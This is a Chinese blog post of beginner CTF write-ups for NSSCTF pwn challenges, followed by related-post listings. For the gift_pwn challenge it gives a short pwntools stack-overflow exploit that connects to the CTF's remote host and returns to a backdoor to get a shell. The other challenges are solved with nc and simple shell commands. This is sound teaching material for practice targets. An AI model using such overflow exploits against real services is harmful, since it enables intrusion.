NSSCTF(PWN)

已于 2024-09-28 20:20:46 修改
阅读量247 收藏 4
点赞数 5
文章标签: linux python 网络安全
于 2024-09-28 18:34:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanshaoze/article/details/142613490
版权

[SWPUCTF 2021 新生赛]nc签到

题目标注nc签到题,我们在虚拟机里用nc,要输入su变成root,才能得到flag

[SWPUCTF 2021 新生赛]gift_pwn

查看main函数,发现了vuln,双击进入

看到read,发现这里涉及典型的栈溢出

shift + F12 我们发现这道题有/bin/sh

ctrl + X 找到binsh地址

发现system和binsh

使用checksec我们发现这个文件是64位的

exp:

from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node4.anna.nssctf.cn','28028')
#io = process('/home/xp/tm/bin/1')
padding = b'a'*(0x10+0x8)
door = 0x4005b6
payload = padding + p64(door)
io.sendline(payload)
io.interactive()

[LitCTF 2023]只需要nc一下~

这道题没有给附件,我们就只能nc一下看看

我们发现这里直接cat flag是不行的

ls一下,我们发现有两个文件,cat看看

一开始还以为直接给了flag,试了发现是错的,看到下面这行,run这个代码就能得到flag

输入echo $FLAG 得到了flag

[NISACTF 2022]ReorPwn?

使用checksec查看文件,发现这题全开了,恐怖如斯进入IDA看看怎么个事

查看main发现fun点开看看

没有发现栈溢出

发现这段代码好像是反过来的,本人本着试试就逝世的态度用了cat flag 反过来打galf tac

得到了flag

[SWPUCTF 2022 新生赛]Does your nc work?

一道简单的签到题,只要nc就行,就是目录有点多,慢慢找就行


得到flag

樊少泽
关注
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 740
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1722
这不是欺负老实人嘛~
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 3470
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
qq_45692883的博客
02-02 453
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
NSSCTF刷题笔记pwn3——[CISCN 2019华北]PWN1
qq_45692883的博客
01-19 501
我们直接覆盖掉返回的地址,返回的地址我们填从result=system("cat /flag")开始即可。这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节。使用ida打开,这里要判断v2要等于11.28125,但是v2压根就不能被改变。gets是栈溢出漏洞的常客了,因为他不会限制我们输入多少内容。差不多就是这里: 0x4006be。知道了这些后,开始写exp。
nss_pwn部分题解
2302_79483906的博客
11-18 499
在函数开始时,通常会将当前函数的rbp保存起来,然后设置新的rbp作为当前栈帧的基址指针,这样可以方便地访问函数的局部变量和参数。附件内容为一个python代码,其中blacklist = ['cat','ls',' ','cd','echo','
NSSCTF靶场刷题(3)
5fn
07-27 1272
NSS靶场刷题记录。题目解析还是尽我所能把细节阐释到位,尽量做到看完一篇wp就能解决所有疑惑。站在小白的视角上写了在写题目的wp方面更多是想体现题目思考的逻辑和细节,更多是写给同样新手小白的内容,解题方面为什么从这一步到下一步的,这样写确实有些麻烦,但是很助于培养思考题目的逻辑思维,有些地方可能理解说辞不是特别到位,如果有问题就麻烦各位大佬师傅指点~
NSSCTF刷题笔记pwn5——[BJDCTF 2020]babystack2.0
qq_45692883的博客
01-30 343
在gdb中,我们可以看到栈溢出的大小是16+8,24字节。使用gdb动态调试,找到栈溢出的大小,ida提示是4。在read中参数nbytes是一个无符号的整数。那么即可为我们写入255个数据,就完成栈溢出。我们发现对比时nbytes是一个整数。估计栈溢出就发生在第二个参数传入时。首先问我们要一个数字,要小于10。而我们最多只能写入9个长度的数据。-1在无符号数中代表255。然后再问我们要一个值。
NSSCTF(PWN)2
最新发布
fanshaoze的博客
09-28 231
checksec看一下文件,发现是64位的查看main函数,有read涉及栈溢出,这里要打印一下name,整形数字要小于10,我们用到-1发现有system和binsh。
2023年SWPU NSS 秋季招新赛 (校外赛道) PWN 题解
2301_77205899的博客
10-24 296
food函数中输入数量 v1为int类型 可以为负数 只要输入一个较大的负数即可使money>10000。read函数 可以溢出 buf距离rbp0xa 但是read可以读入0x10000 后门函数已经给出。简单猜数字 不用脚本 先输入50 如果大了就再输入25小了就75 以此类推。直接利用pwntools写shellcode即可。然后利用泄露puts地址 得到libc基地址。/x00 绕过strlen检测。再执行以下函数door()exp python3语法。
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1944
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[BUUCTF]Pwn刷题记录
x0r
10-13 235
本部分内容长期更新,不再创建新文章影响阅读 rip 根据IDA加载入main函数声明发现s数组距离rbp的距离为F,即为15,这里的运行环境是64位,所以应当将Caller's rbp的数据填满,在这里是8位,即可构造payload from pwn import * p=remote("node4.buuoj.cn", 25401) #p=process("./pwn1") payload=b...
PWN要点记录
m0_51246873的博客
09-23 122
PWN 要点
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4333
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
Linux实践】实验四:Shell实用功能及文件权限
Fulling的博客
09-25 738
实验内容 1、使用命令“cat /etc/named.conf”设置为别名named,然后再取消别名。 2、使用echo命令和输出重定向创建文本文件/root/nn,内容是hello,然后再使用追加重定向输入内容为word。 3、使用管道方式分页显示/etc/passwd的内容。 4、分别用文字设定法和数字设定法,对/root/ab文件设置权限,所有者为读取、写入和执行权限,同组用户为读取和写入权限,其他用户没有任何权限。 5、将文件/root/ab所有者更改为用户zhangsan。 6、将目录/root/
Linux 安装redis主从模式+哨兵模式3台节点
一千个读者就有一千个哈姆雷特
09-27 334
Linux 安装redis主从模式+哨兵模式3台节点
linux】gcc makefile
Quietcoder的博客
09-24 1091
在静态链接中,链接器(如GNU的。
linux 源代码编译
Lxn2zh的博客
09-27 1229
有时候会在linux上下载源码包,然后进行编译成可执行的文件,这个过程需要经过configure、make、make install、make clean四个步骤。configure 为这个程序在当前的操作系统环境下选择合适的编译器和环境参数来编译该代码。make install 将已编译好的可执行文件安装到操作系统指定或默认的安装目录下。make 对程序代码进行编译操作,会将源码编译成可执行的目标文件。make clean 删除编译时临时产生的目录或文件。
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值